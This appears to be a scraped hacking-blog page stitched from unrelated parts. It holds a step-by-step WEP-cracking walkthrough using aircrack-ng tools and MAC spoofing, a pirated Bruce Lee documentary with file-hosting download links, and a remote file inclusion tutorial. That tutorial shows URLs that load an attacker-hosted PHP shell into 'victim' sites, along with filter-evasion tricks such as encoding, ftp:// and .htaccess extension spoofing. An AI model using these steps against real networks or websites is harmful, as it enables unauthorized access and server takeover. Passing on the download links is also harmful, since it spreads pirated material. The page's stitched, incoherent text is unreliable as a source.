Requirements:

* Backtrack 3 on CD or USB
* Computer with compatible 802.11 wireless card
* Wireless Access point or WIFI Router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:

iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]
Then:

ifconfig down [interface]
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:

airmon-ng start [device]
airmon-ngstart1.png
Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]
airodumpwifi0.png

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

airodumpoutput.png

The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplayfakeauth.png

If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplaygenerateivs.png

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.

captureivs_0.png

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aireplayattack2p.png

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.

crackng.png

Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks




The Legend of Bruce Lee 2 DVD (2008)
الفيلم العملاق والذى يحكى قصة الاسطورة بروس لى منذ الطفولة وحتى ارتقاء سلم النجومية فى السينما العالمية
DVDRip | English, Russian | 01:28:36 + 01:37:09 | AVI, XviD 1746 kb/s, 704x384 | AC3, 448 kb/s (6 ch) | 2008 | 1.36 + 1.36 GB
Genre: Documentary, Biography
IMDB Rating: 7.2/10

Unique film biography of the greatest masters of martial arts Bruce Lee, from his childhood and ending with the tragic loss. Chinese filmmakers with amazing precision to recreate all the interiors and the circumstances of the filming of Bruce Lee, told about his family, his difficult journey from boy-student of the prestigious college superstars to world cinema!

~~DownLoad
hotfile
http://hotfile.com/dl/14024691/f91513a/LegeBruLeD1.part1.rar.html
http://hotfile.com/dl/14024693/df0bdeb/LegeBruLeD1.part2.rar.html
http://hotfile.com/dl/14024692/1117af3/LegeBruLeD1.part3.rar.html
http://hotfile.com/dl/14024694/5eb8186/LegeBruLeD1.part4.rar.html
http://hotfile.com/dl/14024695/2333be0/LegeBruLeD1.part5.rar.html
http://hotfile.com/dl/14024696/798d4c5/LegeBruLeD1.part6.rar.html
http://hotfile.com/dl/14024697/4a5f3f2/LegeBruLeD1.part7.rar.html
http://hotfile.com/dl/14024698/64c7985/LegeBruLeD1.part8.rar.html
http://hotfile.com/dl/14024699/e275bde/LegeBruLeD2.part1.rar.html
http://hotfile.com/dl/14024700/cf32359/LegeBruLeD2.part2.rar.html
http://hotfile.com/dl/14024733/8f76033/LegeBruLeD2.part3.rar.html
http://hotfile.com/dl/14024774/08e623c/LegeBruLeD2.part4.rar.html
http://hotfile.com/dl/14024775/b6c57e8/LegeBruLeD2.part5.rar.html
http://hotfile.com/dl/14024778/a96170d/LegeBruLeD2.part6.rar.html
http://hotfile.com/dl/14024805/db9dd4a/LegeBruLeD2.part7.rar.html
http://hotfile.com/dl/14024851/bbe6130/LegeBruLeD2.part8.rar.html

or
filefactory
http://www.filefactory.com/file/a0eaca4/n/LegeBruLeD1_part8_rar
http://www.filefactory.com/file/a0eace3/n/LegeBruLeD1_part3_rar
http://www.filefactory.com/file/a0eace2/n/LegeBruLeD1_part2_rar
http://www.filefactory.com/file/a0eace4/n/LegeBruLeD1_part5_rar
http://www.filefactory.com/file/a0eace6/n/LegeBruLeD1_part7_rar
http://www.filefactory.com/file/a0eace5/n/LegeBruLeD1_part6_rar
http://www.filefactory.com/file/a0eace7/n/LegeBruLeD1_part1_rar
http://www.filefactory.com/file/a0eace8/n/LegeBruLeD1_part4_rar
http://www.filefactory.com/file/a0eacf9/n/LegeBruLeD2_part8_rar
http://www.filefactory.com/file/a0eacga/n/LegeBruLeD2_part1_rar
http://www.filefactory.com/file/a0eacg9/n/LegeBruLeD2_part6_rar
http://www.filefactory.com/file/a0eacha/n/LegeBruLeD2_part7_rar
http://www.filefactory.com/file/a0eachb/n/LegeBruLeD2_part2_rar
http://www.filefactory.com/file/a0eachc/n/LegeBruLeD2_part3_rar
http://www.filefactory.com/file/a0eachd/n/LegeBruLeD2_part4_rar
http://www.filefactory.com/file/a0eache/n/LegeBruLeD2_part5_rar





about remote file inclusion |RFI|

remote file inclusion is where you include a remote file..usaully the file you include will be for malicious purposes

backdoors

what is a backdoor

well your house has a front door...that usually is supposed to be welcoming
a backdoor doesnt look welcoming because people arent usually supposed to use it

a computer backdoor is a code/script that runs on a system with stealth
it allows hackers secret access to the affected system if it is setup up correctly
a backdoor usualy runs as a hidden proccess and will open various port and accept commands for the hacker that is using it

shell

what is a shell

there are many forms of shells..we will not be talking about sea shells today though
a shell on a system is a session/terminal that takes commands etc..like a mini command center
shells can be in php,java,c and other various languages

today i will explain a php shell is

a php shell is a script in php designed to take user inputted commands and browse files,execute commands,edit files,upload files,like a files manager
a php shell is executed via your web browser
eg...www.sites.com/shell.php?
the php shell gives you the same sort of access as if you were at that machine on the same account it is executed on..



remote file inclusion happens usually when someone make a php script and doesnt code it so that the script sanitizes the users input and there are no restrictions running on the server hosting the website with the vulnerable page

a vulnerable page's source code may have this in it



this would mean that

"page" without the quotes is the variable

so you would type

site.com/index.php?page=http://site.com/shell.txt?


note:it must be .txt in extension on server otherwise it will run on the other server where the remote file is located

also rfi wont work if url fopen or url include is disabled or if the page is patched

in order to patch theor script in php they should replace

require($page . "faq.php");


with

require("faq.php");


and then the script cant take user input through the url

also if there is mod_security enabled try encoding the shell link in base 64 or hex code

and for scripts that dont fully sanitise the user input but do check to a certain extent

use the nullbyte trick at the very end of the url

eg:
site.com/index.php?page=http://site.com/shell.txt?


well if there is anything i missed.tell me


edit:
thought of 2 i forgot myself

some filters filter out http:// so try ftp:// instead
so instead of using the http protocal use the ftp protocal

also try converting the shells link to binary
eg

site.com/index.php?page=binary string


---------updated

okies this is just small a update

sometimes a site may have in its code some security code to make it so that the file MUST have an extension of .html or somethinng or .pdf

so if you atacked

127.0.0.1index.php?page=document.pdf


and changed the document.pdf to your shell link

127.0.0.1index.php?page=http://shell.com/shell.txt?


and got an error like this

warning: failed for inclusion http://site.com/shell.txt.pdf? blah blah blah

notice your input was shell.txt and it tried including a file called shell.txt.pdf

then you would goto your shell host and create a rule with a .htaccess file with the following code

AddType application/octect-stream pdf
you could also make it show the php file as a text file by using

AddType text/plain pdf
save this as a .htaccess file with 1 of the 2 codes above

anyways now lets get to the interesting part


now lets remember your php shell must end in a .pdf extension but show as a txt file

so rename your file shell.txt to shell.pdf

now goto your victim site and dont include the extension,let the php code do the work for ya;) teamwork is always usefull


and use

127.0.0.1index.php?page=http://shell.com/shell


because the script automaticly adds the .pdf extension for you so you have
127.0.0.1index.php?page=http://shell.com/shell.pdf


sweet!

anyways hope this is usefull to some ppl







 
Free directory submissions
>: Blog directory Computers blogs Blog Directory & Search engine Computer Security Blogs - BlogCatalog Blog Directory Yoomp blog search directory
Click here to Vote! Hacker TopsitesClick

رشحنا في دليل المواقع العربية دليل المواقع المغرب بلس رشحنا في AlamNew links - دليل عالم نيو رشحنا في دليل مواقع لايف نت